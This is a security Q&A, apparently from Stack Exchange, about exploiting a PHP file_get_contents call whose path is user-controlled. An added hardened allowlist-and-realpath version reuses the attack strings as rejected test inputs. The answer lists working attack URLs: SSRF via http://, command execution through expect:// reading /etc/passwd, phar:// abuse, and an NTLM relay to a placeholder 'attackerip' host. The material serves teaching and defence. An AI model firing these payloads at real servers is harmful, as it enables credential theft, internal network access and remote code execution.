
Let's say I have the following PHP code:

<?php
    echo file_get_contents($_GET['path'] . ".txt");

Obviously, it's insecure as path traversal is possible when passing e.g. ../../file as a GET parameter.

But is there any way for an attacker to retrieve the contents of a file that doesn't end with .txt, as null-byte-related issues like \0 seem to have been fixed in PHP 5.3?

dmuensterer
  • I don't know of any way to access local files which don't end in .txt with this, since both null byte injection and path truncation were fixed in PHP 5.3, but this is also vulnerable to XSS. – nobody Nov 07 '20 at 15:44

1 Answer


Per the comment above, you could use path truncation on an older version of PHP. However, as there is no data before the attacker-controlled data, you can use wrappers (https://www.php.net/manual/en/wrappers.php). This means the vulnerability is not just a directory traversal, but can be used for a number of attacks, including SSRF and remote code execution. Here are a few examples:

  1. Server side request forgery: https://example/file.php?path=http://internalsystem/path/file?junk=

  2. RCE via expect: https://example/file.php?path=expect://cat /etc/passwd;echo

  3. RCE via phar: https://example/file.php?path=phar://tmp/uploadedfile (needs a .txt extension on the uploaded file)

  4. RCE via NTLM relay (if it's a Windows box): https://example/file.php?path=\\attackerip\nonexistentfile You'll need to set up tooling for this, such as Responder (https://github.com/lgandx/Responder).

Depending on the application you may also be able to use the ftp:// and ssh:// wrappers to run commands or access other files on the server.

Hope this helps, and good luck

wireghoul
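Added example, not part of the question or the answer above: the vulnerable snippet from the question placed next to a hardened version, to show why the trailing ".txt" is no protection once the attacker controls the start of the string (stream wrappers, UNC paths) and how an allowlist plus realpath() confinement rejects the payloads listed in the answer. BASE_DIR, the function names and the sample payload list are assumptions made for this demonstration, not values from the original post.

```php
<?php
// Added example, not from the original question or answer.
// Contrasts the vulnerable call from the question with a hardened version.
// BASE_DIR and the payload list below are assumptions for the demonstration.

declare(strict_types=1);

const BASE_DIR = '/var/www/data'; // assumed location of the .txt files

/**
 * Vulnerable form from the question. The caller controls the *prefix* of the
 * string, so "http://", "expect://", "phar://" or "\\host\share" are all
 * accepted by file_get_contents(); the ".txt" suffix restricts nothing.
 * Defined here for contrast only; it is deliberately not called.
 */
function readVulnerable(string $path)
{
    return file_get_contents($path . '.txt');
}

/**
 * Hardened form. Returns the file contents, or null when the request is rejected.
 *
 * 1. Allowlist the name to a single path component of safe characters, so no
 *    "/", "\", ":" or NUL ever reaches the filesystem layer. This rules out
 *    every stream wrapper (scheme needs ":"), UNC paths and "../" traversal.
 * 2. Resolve with realpath() and require the result to stay under BASE_DIR.
 * 3. Require the *resolved* path to end in ".txt": realpath() follows
 *    symlinks, so a link named "a.txt" pointing at "b.conf" is still refused.
 */
function readHardened(string $name): ?string
{
    // Step 1: conservative allowlist, one component only.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    // Step 2: resolve and confine to the base directory.
    $base = realpath(BASE_DIR);
    if ($base === false) {
        return null; // misconfigured base directory
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $name . '.txt');
    if ($full === false) {
        return null; // file does not exist
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // escaped the base directory
    }

    // Step 3: the resolved target must itself be a .txt file.
    if (substr($full, -4) !== '.txt') {
        return null;
    }
    return file_get_contents($full);
}

// Constructed payloads (the ones from the answer, plus plain traversal and a
// NUL byte). Each is rejected by the allowlist before any I/O happens.
$payloads = [
    '../../etc/passwd',
    'http://internalsystem/path/file?junk=',
    'expect://cat /etc/passwd;echo',
    'phar://tmp/uploadedfile',
    '\\\\attackerip\\nonexistentfile',
    "report\0",
    'report',            // the only well-formed name; allowed if the file exists
];
foreach ($payloads as $p) {
    $verdict = readHardened($p) === null ? 'rejected (or missing)' : 'allowed';
    printf("%-45s -> %s\n", json_encode($p), $verdict);
}
```

The allowlist is deliberately preferred over a denylist of wrapper prefixes: PHP ships more wrappers than the answer lists (php://, data://, glob://, file:// among them), and a denylist would have to track all of them. Setting allow_url_fopen=Off in php.ini is a useful defence in depth against the http:// and ftp:// cases for the fopen family, but it does not cover local wrappers such as phar://, so it is no substitute for validating the input.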